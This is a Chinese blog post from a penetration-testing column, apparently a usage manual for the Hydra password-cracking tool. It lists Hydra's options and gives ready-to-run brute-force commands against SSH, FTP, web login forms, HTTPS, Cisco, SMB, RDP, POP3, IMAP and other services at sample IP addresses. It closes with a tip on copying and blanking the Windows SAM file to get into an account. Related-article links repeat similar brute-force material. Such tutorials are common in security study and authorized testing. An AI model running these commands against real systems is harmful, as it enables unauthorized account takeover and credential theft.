hydra使用手册

最新推荐文章于 2024-05-19 07:30:00 发布
最新推荐文章于 2024-05-19 07:30:00 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ALone_wm/article/details/90236633
版权

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项

1.破解ssh:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
# hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2.破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3.get方式提交,破解web登录:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4.post方式提交,破解web登录:

# hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)

5.破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6.破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7.破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8.破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb

9.破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3

10.破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V

11.破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

12.破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 

 

小知识:

找到Windows/system32/config/SAM
使用PE将其拷贝,然后清除源文件(清除为只清除数据,而非删除),获取数据后,再讲复制的SAM覆盖回去
成果:可以在不改变其密码的情况下获取数据

吟泱
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hydra使用帮助手册
01-17
是用kali linux 是离不开hydra的 这是一个很强大的工具 hydra使用帮助手册(官方原版) 此手册有详细的各个参数解释说明并举例,也有所有支持的协议 等
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
m0_61869253的博客
09-07 4091
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
hydra常用命令
qq_39511050的博客
06-24 659
hydra
黑客常用的暴力破解工具hydra使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-19 2036
Hydra中文名称九头蛇,是著名黑客组织thc的一款开源的暴力密码破解工具,可以爆破多种服务的账号和密码,包括 Web 登录、数据库、SSH、FTP 等服务,支持 Linux、Windows、Mac 平台安装, Kali Linux中自带 Hydra。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。
linux 下暴力破解工具hydra
weixin_34337265的博客
01-09 202
安装暴力破解工具# yum install cmake# cd /usr/local/src# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz# tar zxf libssh-0.4.8.tar.gz# cd libssh-0.4.8# mkdir build# cd build# cmake -DCMAKE_...
Linux下暴力破解工具Hydra详解
GodLaughing
10-09 2575
Syntax # hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解
hydra(九头蛇)--参数及常见命令
wzhua的博客
09-22 4078
hydra(九头蛇)--参数及常见命令
hydra 使用手册
11-11
是用kali linux 是离不开hydra的 这是一个很强大的工具
Hydra 安装手册1
08-08
Hydra 安装手册1】是一份详细指导如何在特定环境下部署Hydra系统的文档,主要面向大数据平台的用户和开发者。Hydra系统是构建在Dubbo框架下的分布式服务集群,提供了一种服务化解决方案,它包含多个组件,如...
Hydra 安装手册.docx
03-11
Hydra安装手册》 Hydra是一款基于Alibaba的Dubbo框架构建的服务追踪系统,它主要分为两个版本:内部使用版和外部开放版。这两个版本在架构和部署方式上略有不同,但都旨在提供对服务调用链路的深度监控和分析。本...
Hydra常用命令
weixin_63286108的博客
05-11 2729
Hydra 常用功能选项( 参数)说明 -l: 指定单个用户名, 适合在知道用户名的情况下爆破密码时使用 -L : 指定多个用户名, 参数值为存储用户名的文件(字典)的路径(建议为绝对路径) -p: 指定单个密码, 适合在知道密码的情况下爆破用户名时使用 -P : 指定多个密码, 参数值为存储密码的文件( 字典) 的路径(建议为绝对路径) -C: 当用户名和密码存储到一个文件时使用此参数。注意: 文件(字典) 存储的格式必须为" 用户名:密码" 的格式 -M : 指定多个攻击目标, 此参数为存储...
Hydra:神经网络训练的好伙伴
qq_39344285的博客
03-25 4110
Hydra 1. 介绍: Hydra 能通过解析和覆写 config文件和 command命令动态构建多层次配置。 可以从多个来源组合的分层配置 可以从命令行指定或覆盖配置 动态命令行选项卡完成 在本地运行您的应用程序或启动它以远程运行 使用单个命令以不同的参数运行多个作业 # config.yaml db: driver: mysql user: omry pass: secret # my_app.py import hydra from omegaconf import Di
Hydra学习笔记
zr1213159840的博客
06-04 809
hydra学习笔记
hydra】基础教程-简易命令行应用
jxf_jxfcsdn的博客
03-30 2758
1.安装 pip install hydra-core --upgrade conf/config.yaml --------------------------------- db: driver: mysql user: omry pass: secret my_app.py --------------------------------------------- import hydra from omegaconf import DictConfig, OmegaConf
Hydra/Medusa爆破工具命令参数和简单操作
m0_73128456的博客
11-13 2104
l :指定单个用户名称-L:指定用户名称字典-p :指定单个密码-P :指定密码字典-vV :显示详细的执行过程-R :根据上一次进度继续破解-S :使用SSl协议连接-s :指定端口-o :输出文件-C :指定用户密码字典-e :空密码探测和指定用户密码探测-t :指定爆破时的任务数量(可以理解为线程数),默认为16-f :一但爆破成功一个就停止爆破-v/-V :显示爆破的详细信息-M :指定多个攻击目标,此参数为储存攻击目标的文件的路径(建议为绝对路径)。
端口渗透·网站渗透过程 --21 ,22,873,3306,6379,8080(8080端口是针对CMS的渗透)...
weixin_34362790的博客
06-04 2619
声明:文章渗透网站为模拟环境,文章只为利用过程 文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透 信息收集: ·使用扫描工具nmap ,PortScan 对整个网段进行扫描 信息:通过访问网站得到要测试...
hydra 的基本使用方法
热门推荐
还算勤恳的小菜鸟
03-25 5万+
命令基本格式:hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server...
Hydra使用说明——爆破神器
Hydra的博客
11-26 3万+
一、简介  hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。  官 网:http://www.thc.org/thc-hydra。 可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,...
【经验分享】Hydra(爆破神器)使用方法
weixin_33730836的博客
11-08 3736
这个也是backtrack下面很受欢迎的一个工具 参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多...
UM-Hydra3D-UserManual-Rev0.5.pdf
03-06
UM-Hydra3D-UserManual-Rev0.5.pdf is a user manual for the Hydra3D ToF CMOS Sensor, provided by e2v....No 428/2009 or (Spain) Real Decreto 679/2014. The manual begins with a general description of the ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值